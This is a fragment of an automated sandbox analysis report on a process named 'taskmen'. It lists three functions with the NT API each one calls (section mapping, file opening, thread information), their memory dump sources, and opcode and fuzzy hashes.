                                                                                        • Snapshot File: hcaresult_32_2_5530000_taskmen.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: 2f28ff2595545eeb245ea17cadf71169b9246a956213c0a74622d949b1bfc5bf
                                                                                        • Instruction ID: d591eee435cda698bb328c31a07a4154058a6ed80e6dc84e61d09dd68401ebac
                                                                                        • Opcode Fuzzy Hash: 2f28ff2595545eeb245ea17cadf71169b9246a956213c0a74622d949b1bfc5bf
                                                                                        • Instruction Fuzzy Hash: A95189B9D052489FCF10DFA9D9809DEFBB1BF5A310F20A52AE808B7210D735A945CF58
                                                                                        Function 0553C920 Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,?,?), ref: 0553CA1D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000020.00000002.4688817483.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_32_2_5530000_taskmen.jbxd
                                                                                        Similarity
                                                                                        • API ID: SectionView
                                                                                        • String ID:
                                                                                        • API String ID: 1323581903-0
                                                                                        • Opcode ID: 4cc2e0827cf29b4e070fa24631857b70b72b0e4bf6d97f8878e014a5b5bace21
                                                                                        • Instruction ID: c056345ecf8586ba081e74756c3e3660e8b2a24a6282c8bd41f32065b9f251ea
                                                                                        • Opcode Fuzzy Hash: 4cc2e0827cf29b4e070fa24631857b70b72b0e4bf6d97f8878e014a5b5bace21
                                                                                        • Instruction Fuzzy Hash: EF517AB9D042489BCF10DFA9D9809DEFBB1BF5A310F20A12AE918B7210D735A945CF58
                                                                                        Function 0553C581 Relevance: 1.6, APIs: 1, Instructions: 113filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 0553C648
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000020.00000002.4688817483.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_32_2_5530000_taskmen.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2669468079-0
                                                                                        • Opcode ID: d09f2d970a153ed514a084db632f2e021d429e112e1d17bab2cb098f2d83a32f
                                                                                        • Instruction ID: caaa9a15ddfa43811872568216eafc4604dc09a633864c360296513662a10f08
                                                                                        • Opcode Fuzzy Hash: d09f2d970a153ed514a084db632f2e021d429e112e1d17bab2cb098f2d83a32f
                                                                                        • Instruction Fuzzy Hash: A74169B9D052589FCF10CFA9D985AEEFBB1BF09310F10942AE819B7210D735A945CF64
                                                                                        Function 0553B990 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtSetInformationThread.NTDLL(?,?,?,?), ref: 0553BA2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000020.00000002.4688817483.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_32_2_5530000_taskmen.jbxd
                                                                                        Similarity
                                                                                        • API ID: InformationThread
                                                                                        • String ID:
                                                                                        • API String ID: 4046476035-0
                                                                                        • Opcode ID: 53afa19f56be081e432b6bf8b43e4a714d2f2deb4ad43da88472c7a8ddbb16d0
                                                                                        • Instruction ID: e3eb126cc1f772d22a6ef81e78c3301f9ff3966b11c9559f22015d39f85d1edd
                                                                                        • Opcode Fuzzy Hash: 53afa19f56be081e432b6bf8b43e4a714d2f2deb4ad43da88472c7a8ddbb16d0
                                                                                        • Instruction Fuzzy Hash: F53198B8D042489FCF10CFA9D980AAEFBB1FF49310F20942AE819B7210D735A945CF94